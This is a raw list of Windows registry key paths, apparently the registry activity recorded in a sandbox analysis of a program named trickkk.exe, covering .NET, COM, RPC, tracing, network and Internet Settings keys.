HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.JScript__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\trickkk.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\863BC3C7
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_CURRENT_USER\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|trickkk.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|trickkk.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|trickkk.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EnableConsoleTracing
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\trickkk_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_CURRENT_USER
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
